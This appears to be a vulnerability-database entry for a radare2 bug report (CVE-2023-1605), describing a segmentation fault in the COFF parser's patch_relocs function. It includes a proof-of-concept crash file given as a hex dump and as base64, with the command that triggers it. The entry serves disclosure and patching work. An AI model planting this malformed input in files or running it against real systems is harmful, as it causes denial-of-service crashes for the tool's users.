Lucene search
Echel0nn9DDDCF5B-7DD4-46CC-ABF9-172DCE20BAB2HistoryMar 21, 2023 - 5:24 p.m.
SIGSEGV at libr/bin/p/bin_coff.c:509 in patch_relocs()
2023-03-2117:24:11
echel0nn
www.huntr.dev
13
radare2
coff
file parsing
segmentation fault
bugbounty
symbol information
proof of concept
bin_coff
patch_relocs
EPSS
0.001
Percentile
40.4%
Description
radare2 5.8.2 misparses symbol information in COFF files, causing a segmentation fault in patch_relocs at libr/bin/p/bin_coff.c:509
Proof of Concept
input.bin
00000000: 6603 e846 4058 6458 4036 5858 5858 5868 f..F@XdX@6XXXXXh
00000010: 5858 7063 5858 5840 0038 00de 57ff ffff [email protected]...
00000020: 7f58 5858 0600 0000 0000 0010 0038 00de .XXX.........8..
00000030: 57ff ffff 7f58 5858 0600 0000 0000 0010 W....XXX........
00000040: 0000 00ff 7fce 0000 4000 b03c 0000 ff7f ........@..<....
00000050: ce00 0040 00b0 3c31 4058 d5d5 d5d5 5800 ...@..<[email protected].
00000060: 00ff 4f0f 05 ..O..
ZgPoRkBYZFhANlhYWFhYaFhYcGNYWFhAADgA3lf///9/WFhYBgAAAAAAABAAOADeV////39YWFgGAAAAAAAAEAAAAP9/zgAAQACwPAAA/3/OAABAALA8MUBY1dXV1VgAAP9PDwU=
run with
r2 ./provided.bin
Related
ubuntucve
ubuntucve
CVE-2023-1605
2023-03-23 00:00:00
cvelist
cvelist
CVE-2023-1605 Denial of Service in radareorg/radare2
2023-03-23 00:00:00
prion
prion
Denial of service
2023-03-23 19:15:00
cve
cve
CVE-2023-1605
2023-03-23 19:15:12
osv
osv
CVE-2023-1605
2023-03-23 19:15:12
radare2-5.8.6-1.1 on GA media
2024-06-15 00:00:00
nvd
nvd
CVE-2023-1605
2023-03-23 19:15:12
debiancve
debiancve
CVE-2023-1605
2023-03-23 19:15:12
alpinelinux
alpinelinux
CVE-2023-1605
2023-03-23 19:15:00